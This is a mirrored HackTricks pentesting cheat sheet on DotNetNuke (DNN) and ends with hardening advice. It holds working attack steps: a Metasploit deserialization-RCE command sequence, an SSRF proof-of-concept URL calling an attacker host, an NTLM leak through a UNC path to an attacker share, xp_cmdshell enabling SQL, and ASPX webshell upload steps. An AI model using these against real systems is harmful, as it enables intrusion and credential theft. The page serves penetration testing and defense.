maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

4.4 KiB
Raw Blame History

DotNetNuke (DNN)

{{#include ../../banners/hacktricks-training.md}}

DotNetNuke (DNN)

If you enter as administrator in DNN it's easy to obtain RCE, however a number of unauthenticated and post-auth techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.

Version & Environment Enumeration

  • Check the X-DNN HTTP response header it usually discloses the exact platform version.
  • The installation wizard leaks the version in /Install/Install.aspx?mode=install (accessible on very old installs).
  • /API/PersonaBar/GetStatus (9.x) returns a JSON blob containing "dnnVersion" for low-privilege users.
  • Typical cookies you will see on a live instance:
    • .DOTNETNUKE ASP.NET forms authentication ticket.
    • DNNPersonalization contains XML/serialized user profile data (old versions see RCE below).

Unauthenticated Exploitation

1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)

Affected versions ≤ 9.3.0-RC

DNNPersonalization is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works without authentication on 7.x9.1.x and with a verified low-privilege account on 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Affected versions < 9.13.8 Patch released April 2025

A bypass of the older DnnImageHandler fix enables an attacker to coerce the server to issue arbitrary GET requests (semi-blind SSRF). Practical impacts:

  • Internal port scan / metadata service discovery in cloud deployments.
  • Reach hosts otherwise firewalled from the Internet.

Proof-of-concept (replace TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

The request is triggered in the background; monitor your listener for callbacks.

3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)

Affected versions 6.0.0 9.x (< 10.0.1)

Specially crafted content can make DNN attempt to fetch a resource using a UNC path such as \\attacker\share\img.png. Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker. Upgrade to 10.0.1 or disable outbound SMB at the firewall.

4. IP Filter Bypass (CVE-2025-52487)

If administrators rely on Host/IP Filters for admin portal protection, be aware that versions prior to 10.0.1 can be bypassed by manipulating X-Forwarded-For in a reverse-proxy scenario.

Post-Authentication to RCE

Via SQL console

Under Settings → SQL a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable xp_cmdshell and spawn commands:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Via ASPX webshell upload

  1. Go to Settings → Security → More → More Security Settings.
  2. Append aspx (or asp) to Allowable File Extensions and Save.
  3. Browse to /admin/file-management and upload shell.aspx.
  4. Trigger it at /Portals/0/shell.aspx.

Privilege Escalation on Windows

Once code execution is achieved as IIS AppPool<Site>, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:

  • PrintSpoofer / SpoolFool to abuse SeImpersonatePrivilege.
  • Juicy/Sharp Potatoes to escape Service Accounts.

Hardening Recommendations (Blue Team)

  • Upgrade to at least 9.13.9 (fixes SSRF bypass) or preferably 10.0.1 (IP filter & NTLM issues).
  • Remove residual InstallWizard.aspx* files after installation.
  • Disable outbound SMB (ports 445/139) egress.
  • Enforce strong Host Filters on the edge proxy rather than within DNN.
  • Block access to /API/RemoteContentProxy if unused.

References

  • Metasploit dnn_cookie_deserialization_rce module documentation practical unauthenticated RCE details (GitHub).
  • GitHub Security Advisory GHSA-3f7v-qx94-666m 2025 SSRF bypass & patch information. {{#include ../../banners/hacktricks-training.md}}